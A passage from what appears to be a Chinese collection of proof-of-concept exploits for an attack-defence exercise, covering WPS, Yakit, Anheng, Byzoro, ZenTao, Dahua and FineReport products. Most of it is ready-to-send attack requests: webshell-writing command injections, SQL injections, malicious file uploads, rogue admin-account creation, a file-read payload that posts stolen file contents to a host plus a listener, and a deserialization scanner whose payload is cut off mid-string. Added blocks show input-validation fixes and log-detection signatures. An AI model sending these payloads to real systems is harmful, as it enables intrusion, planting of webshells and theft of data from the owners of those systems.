  write8(rwx_mem+i,shellcode[i]);
}
f();
</script>

The vulnerability triggers as long as the host name satisfies clientweb.docer.wps.cn.{xxxxx}wps.cn; cloudwps.cn has no relation to wps.cn. In a real attack, clientweb.docer.wps.cn.hellowps.cn works as well.
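The trigger condition says what kind of check failed: a host name that merely starts with the trusted host and ends with `wps.cn` was treated as trusted, although `cloudwps.cn` and `hellowps.cn` are unrelated registrable domains. Below is an added example, not WPS code: `naive_is_trusted()` is an assumed reconstruction of a check that accepts the pattern the page describes (how WPS actually matched is not on the page), next to a version that compares on a label boundary.

```python
from urllib.parse import urlsplit

# Added example, not WPS code. The page gives the accepted pattern
# clientweb.docer.wps.cn.{xxxxx}wps.cn; naive_is_trusted() is an assumed
# reconstruction of a check that accepts it, not WPS's implementation.
TRUSTED_HOST = "clientweb.docer.wps.cn"
TRUSTED_ZONE = "wps.cn"


def naive_is_trusted(host: str) -> bool:
    """Prefix + suffix string test. There is no label boundary, so
    'clientweb.docer.wps.cn.cloudwps.cn' satisfies both halves."""
    return host.startswith(TRUSTED_HOST) and host.endswith(TRUSTED_ZONE)


def strict_is_trusted(host: str) -> bool:
    """Exact host, or a subdomain of the trusted zone on a '.' boundary.

    'x.cloudwps.cn' ends with 'wps.cn' but not with '.wps.cn', so it fails;
    only names that DNS actually places under wps.cn can pass.
    """
    host = host.strip().rstrip(".").lower()
    if host == TRUSTED_HOST:
        return True
    return host.endswith("." + TRUSTED_ZONE)


def page_is_trusted(url: str, check=strict_is_trusted) -> bool:
    """Apply the check to the parsed host of a URL, never to the raw URL
    string (where 'clientweb.docer.wps.cn' could also appear in the path)."""
    host = urlsplit(url).hostname
    return bool(host) and check(host)


if __name__ == "__main__":
    for h in ["clientweb.docer.wps.cn",
              "clientweb.docer.wps.cn.cloudwps.cn",
              "clientweb.docer.wps.cn.hellowps.cn"]:
        print(f"{h:40} naive={naive_is_trusted(h)!s:5} strict={strict_is_trusted(h)}")
```

Trusting the whole `*.wps.cn` zone is still a wide grant (any dangling subdomain becomes an attack surface); the tighter option for a code-loading context is the exact-host branch alone.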

24. Yakit arbitrary file read

See the original article for screenshots of the reproduction: 【漏洞复现】Yakit任意文件读取

Background: Yakit is a recent BurpSuite alternative; unlike Burp you do not have to configure IP, port and protocol when handing a packet over, but Yakit feels laggy compared with Burp. Yakit recently disclosed an arbitrary file read: JavaScript embedded in a web page reads files from the machine of the Yakit user. Affected versions: engine version < Yaklang 1.2.4-sp2. Precondition: the Yakit MITM proxy is in use and at least one plugin is enabled.

Payload:
<script>
  const xhr = new XMLHttpRequest();
  xhr.open("POST", "http://yakit.com/filesubmit");
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhr.send(`file={{base64enc(file(C:\\Windows\\System32\\drivers\\etc\\hosts))}}`);
</script>

Listener script
#! /bin/python3
import socket

# Listen address and port
host = '0.0.0.0'
port = 23800

# Create the socket server
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

# Bind and listen
server.bind((host, port))
server.listen()

# Accept connections and dump each request
print("Listening...")
while True:
    # Accept a client connection
    client, address = server.accept()
    print(f"Connected by {address}")

    # Read the request data (stops on a short read)
    request = ''
    while True:
        input_data = client.recv(1024).decode('utf-8', errors='replace')
        request += input_data
        if len(input_data) < 1024:
            break

    # Print the request line and headers
    headers = request.split('\n')
    print("Received headers:")
    for header in headers:
        print(header)

    # Close the client connection
    client.close()

Reproduction: create an HTML page and insert the payload.

Visit with the MITM proxy enabled but no plugin enabled: (screenshot in the original article)
Visit with the MITM proxy enabled and a plugin enabled: (screenshot in the original article)

Principle: by default Yakit does not evaluate fuzztags in traffic that passes through the MITM proxy, but traffic that passes through a plugin has them evaluated; this is also the limiting condition for exploitation.

25. Anheng Mingyu Security Gateway RCE

GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php HTTP/1.1
Host: xxx
Cookie: USGSESSID=495b895ddd42b82cd89a29f241825081
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3994.108 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Webshell path: http://xxx/webui/.xxx.php

26. Anheng Mingyu Operations Audit and Risk Control System (bastion host) arbitrary user registration

POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx
Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 1121

<?xml version="1.0"?>
<methodCall>
<methodName>web.user_add</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<string>admin</string>
</value>
<value>
<string>5</string>
</value>
<value>
<string>XX.XX.XX.XX</string>
</value>
</data>
</array>
</value>
</param>
<param>
<value>
<struct>
<member>
<name>uname</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>name</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>pwd</name>
<value>
<string>Deptadmin@123</string>
</value>
</member>
<member>
<name>authmode</name>
<value>
<string>1</string>
</value>
</member>
<member>
<name>deptid</name>
<value>
<string></string>
</value>
</member>
<member>
<name>email</name>
<value>
<string></string>
</value>
</member>
<member>
<name>mobile</name>
<value>
<string></string>
</value>
</member>
<member>
<name>comment</name>
<value>
<string></string>
</value>
</member>
<member>
<name>roleid</name>
<value>
<string>101</string>
</value>
</member>
</struct></value>
</param>
</params>
</methodCall>

27. Byzoro Smart S85F backend file upload vulnerability

POST /useratte/web.php? HTTP/1.1
Host: xx.xx.xx.xx:8443
Cookie: PHPSESSID=xxxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 598
Upgrade-Insecure-Requests: 1
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?=phpinfo();
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

28. Byzoro Smart S45F command execution

Construct the URL: /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc3lzMS5waHAn

The base64 `sql` value decodes to `select 0x3c3f...3e into outfile '/usr/hddocs/nsg/app/sys1.php'`, where the hex literal is `<?php echo system($_POST["cmd"]);?>`: the injected statement writes a PHP one-liner into the web root, which the second request then calls.

Construct the POC:
POST /app/sys1.php HTTP/1.1
Host: 60.22.74.195:8443
Cookie:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

cmd=id

29. ZenTao 16.5 router.class.php SQL injection vulnerability

POST /user-login.html

   account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23

30. ZenTao 18.0-18.3 backstage command injection

POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json,text/javascript,*/*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/zentaopms/www/index.php?m=zahost&f=create
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 134
Origin: http://127.0.0.1
Connection: close
Cookie: zentaosid=dhjpu2i3g5116j5eba85agl27f; lang=zh-cn; device=desktop; theme=default; tab=qa; windowWidth=1632; windowHeight=783
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0,1%7Ccalc.exe&cpuCores=2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=za
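Several entries on this page share one root cause: a request field is spliced into a shell command line (Eramba `path=ip%20a;`, Hytec `command=...;cat /etc/shadow`, Panabit `ntpserver=0.0.0.0;whoami`, the Anheng gateway `suffix=1|echo ...`, and the ZenTao `extranet=...|calc.exe` request just above). The block below is an added example, not vendor code, built around the Panabit NTP-server field: the vulnerable string build, a tokenizer that shows how a POSIX shell would split it, and the fixed version that validates the field against a host-name grammar and passes it as one argv element so no shell is involved. `ntpdate` as the invoked program is an assumption for illustration.

```python
import re
import shlex
import subprocess
from typing import List

# Added example, not vendor code. ntpdate is an assumed program name.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)
SHELL_OPERATORS = {";", "|", "||", "&", "&&"}


def vulnerable_ntp_command(ntpserver: str) -> str:
    """The defective pattern: the raw field becomes part of a shell string,
    as if handed to system() or subprocess.run(..., shell=True)."""
    return f"ntpdate {ntpserver}"


def shell_command_count(cmdline: str) -> int:
    """How many commands a POSIX shell would run for this line.

    shlex with punctuation_chars=True splits ';', '|' and '&' the way a shell
    does, so 'ntpdate 0.0.0.0;whoami' yields 2 commands, 'ntpdate 0.0.0.0' 1.
    """
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    return 1 + sum(1 for tok in lexer if tok in SHELL_OPERATORS)


def is_valid_ntp_server(value: str) -> bool:
    """Allow-list: a DNS host name or dotted IPv4 literal, nothing else."""
    return bool(HOSTNAME_RE.match(value))


def safe_ntp_argv(ntpserver: str) -> List[str]:
    """The fix: validate, then pass the value as a single argv element."""
    if not is_valid_ntp_server(ntpserver):
        raise ValueError(f"invalid NTP server: {ntpserver!r}")
    return ["ntpdate", ntpserver]


def run_ntp_sync(ntpserver: str) -> "subprocess.CompletedProcess[str]":
    """argv list and no shell: any metacharacter left in ntpserver reaches
    ntpdate as data, not as shell syntax (and is rejected before that anyway)."""
    return subprocess.run(safe_ntp_argv(ntpserver), capture_output=True, text=True, check=False)


if __name__ == "__main__":
    for value in ["0.0.0.0", "0.0.0.0;whoami"]:
        line = vulnerable_ntp_command(value)
        print(f"{line!r:30} -> {shell_command_count(line)} command(s)")
        print("   argv:" if is_valid_ntp_server(value) else "   rejected:",
              safe_ntp_argv(value) if is_valid_ntp_server(value) else repr(value))
    # The other injected lines from this page, as the shell would split them.
    for line in ["ping -c 4 1.1.1.1;cat /etc/shadow", "1|echo x"]:
        print(f"{line!r:40} -> {shell_command_count(line)} command(s)")
```

Escaping with `shlex.quote()` and keeping `shell=True` also works, but the allow-list plus argv form removes the shell from the path entirely, which is the version that survives the next parameter someone adds.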

31. Chenxin Jingyun Terminal Security Management System login SQL injection vulnerability

POST /api/user/login

captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='

32. Dahua vehicle-mounted system arbitrary file upload vulnerability POC

POST /vehicleServer/carDev/icon/import/1?iconType=1 HTTP/1.1
Host: ip:port
Accept: */*
Accept-Encoding: gzip, deflate, br
Content-Length: 872
Content-Type: multipart/form-data; boundary=----63766573e5ae9ee9aa8ce5aea4
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.9.1 Chrome/56.0.2924.122 Safari/537.36

------63766573e5ae9ee9aa8ce5aea4
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: image/png

GIF89a
<% JSP webshell body %>
------63766573e5ae9ee9aa8ce5aea4--

Retrieve the upload path:

GET /vehicleServer/carDev/icon/getIconList?nowTime=164605907220

33. Dahua Smart Park arbitrary password read

GET /admin/user_getUserInfoByUserName.action?userName=system

34. Dahua Smart Park Integrated Management Platform searchJson SQL injection vulnerability

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

35. Dahua Smart Park Integrated Management Platform file upload vulnerability

POST /publishing/publishing/material/file/video HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close

--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"

<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="poc"

poc
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"

submit
--dd8f988919484abab3816881c55272a7--

36. FineReport channel deserialization

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# FineReport channel interface deserialization
# Author: SXdysq

import base64
import requests
import urllib3
import concurrent.futures

urllib3.disable_warnings()

headers = {
    "Pragma": "no-cache",
    "Cache-Control": "no-cache",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
    "Accept-Language": "zh-CN,zh;q=0.9",
    "Connection": "close",
}

def check(host):
    # A GET that is answered with "method 'GET' not supported" means the channel
    # endpoint exists; a POST that is not blocked with the "contact the
    # administrator for access" page means it is reachable, so try the payload.
    try:
        burp0_url = host + "/webroot/decision/remote/design/channel"
        req = requests.get(burp0_url, headers=headers, verify=False, timeout=3)
        if "method 'GET' not supported" in req.text:
            req = requests.post(burp0_url, headers=headers, verify=False, timeout=3)
            if "如需访问请联系管理员" not in req.text:
                cmd(host)
            else:
                print("[o]", host, "------not vulnerable!")
        else:
            print("[o]", host, "------not vulnerable!")
    except Exception as e:
        print("[o]", host, "------not vulnerable!")

def cmd(host):
    try:
        burp0_url = host + "/webroot/decision/remote/design/channel"
        burp0_headers = {"Content-Type": "application/x-www-form-urlencoded", "Testdmc": "whoami", "Testecho": "TestEcho"}
        b = b"H4sIAAAAAAAAAK1YCXwcVRn/z2Z3ZzKZXNum7bSAVGtJW7KDBUrZQKG5SugmrWzakqYYJrvTZMruzHZmtt144AWIeAEeWLwQhaiAUtAtULlEq4CoXB4geOOJFx4VofF7b3Y31zYt/Mxv82bee9/3f9/93pubn0fIddC4Q9+lR3OemY6eo7sjPXo2JD51/wPzLny0CoEuyGlbT3XpSc92ulHtjTiGO2KnU/nsWWeD/+2WqAmwfwI7KWlnotudqDdiOqmo7QxHR8whw7F0z4ga1rBpGVE3a0b7RrNGarOezhmNj3yk508HH7wmgEAcQY/GPSyNE4q23dE4ikYoWhlFYyQa42+NI7SLQXiIxJkOWlq3hrUNQzuMpNeaz5I0LbNIw3Ci7XYma1uG5THADZdpz9bu2HtcAHVbcUzSMYisM5P1RjmVa3qG22npQ2kjtRWREd3ttb3eXDq90bGzhuONbkXIdNcbo91QssWhRFa
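Nothing on this page says how to spot these requests in traffic, which is the other half of the job during an HW exercise. The block below is an added example, not part of the source: it turns the request patterns of the entries above into regex signatures, percent-decodes the URL before matching so encoded traversal (`..%2F`, `%7C`) does not evade, and runs them over a handful of constructed access-log lines. The rule names and the log lines are constructed for the demo. Payloads carried only in a POST body (the ZenTao and Chenxin login injections, the multipart uploads) are not visible in an access log and need request-body logging or a WAF rule instead.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Added example, not from the page's source. Rule names are chosen for the demo;
# each regex follows one of the POC request lines above.
SIGNATURES = {
    "1panel-loadfile": re.compile(r"/api/v1/file/loadfile"),
    "360-admin-log-conf": re.compile(r"/runtime/admin_log_conf\.cache"),
    "coldfusion-adminapi": re.compile(r"/CFIDE/adminapi/base\.cfc"),
    "eramba-download-test-pdf-cmdi": re.compile(r"/settings/download-test-pdf\?path=[^&]*[;|`]"),
    "gitlab-uploads-traversal": re.compile(r"/uploads/[0-9a-f]{32}/.*\.\./"),
    "hikvision-showfile-traversal": re.compile(r"/serverLog/showFile\.php\?fileName=.*\.\./"),
    "hikvision-artemis-env": re.compile(r"/artemis-portal/artemis/env"),
    "hytec-popen-cmdi": re.compile(r"/cgi-bin/popen\.cgi\?command=[^&]*[;|`]"),
    "kubepi-user-create": re.compile(r"/kubepi/api/v1/users"),
    "livebos-showimage-traversal": re.compile(r"/feed/ShowImage\.do.*imgName=.*\.\./"),
    "openfire-user-create-bypass": re.compile(r"/user-create\.jsp\?.*isadmin=on"),
    "panabit-date-config": re.compile(r"/cgi-bin/Maintain/date_config"),
    "dahua-getuserinfo": re.compile(r"/admin/user_getUserInfoByUserName\.action"),
    "anheng-usg-webui-cmdi": re.compile(r"/webui/\?g=aaa_portal_auth_local_submit.*suffix="),
    "sqli-error-based": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "sqli-time-based": re.compile(r"\bsleep\s*\(", re.I),
}
# Endpoints that are legitimate to read but only abused via POST.
POST_ONLY = {"kubepi-user-create", "panabit-date-config"}

# Common/combined log format; the constructed sample lines below follow it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def match_request(method: str, url: str) -> List[str]:
    """Rule names that fire for one request. The URL is decoded twice so that
    '..%2F' and double-encoded '%252F' both become '../' before matching."""
    decoded = unquote(unquote(url))
    hits = []
    for name, rx in SIGNATURES.items():
        if name in POST_ONLY and method != "POST":
            continue
        if rx.search(decoded):
            hits.append(name)
    return hits


def scan_log(lines) -> List[Dict[str, object]]:
    """Parse each access-log line and keep those that match a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = match_request(m["method"], m["url"])
        if hits:
            findings.append({"ip": m["ip"], "method": m["method"], "url": m["url"],
                             "status": m["status"], "rules": hits})
    return findings


# Constructed sample log lines (not real traffic); URLs follow the POCs above.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Aug/2023:10:00:01 +0800] "GET /serverLog/showFile.php?fileName=../web/html/main.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [20/Aug/2023:10:00:02 +0800] "GET /cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.13 HTTP/1.1" 200 88',
    '198.51.100.7 - - [20/Aug/2023:10:00:03 +0800] "POST /kubepi/api/v1/users HTTP/1.1" 201 200',
    '198.51.100.7 - - [20/Aug/2023:10:00:04 +0800] "GET /kubepi/api/v1/users HTTP/1.1" 200 300',
    '203.0.113.9 - - [20/Aug/2023:10:00:05 +0800] "GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1" 500 0',
    '192.0.2.4 - - [20/Aug/2023:10:00:06 +0800] "GET /index.html HTTP/1.1" 200 1024',
    '203.0.113.5 - - [20/Aug/2023:10:00:07 +0800] "GET /group1/project9/uploads/4e02c376ac758e162ec674399741e38d//..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1200',
]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:14} {f['method']:4} {f['status']} {','.join(f['rules'])}  {f['url'][:60]}")
```

The endpoint-only rules (`hikvision-artemis-env`, `dahua-getuserinfo`, the KubePi and Panabit paths) will also fire on legitimate administration, so pair them with source-IP allow-lists or response-size baselines before alerting on them; the traversal and injection rules carry their own evidence in the URL and can alert directly.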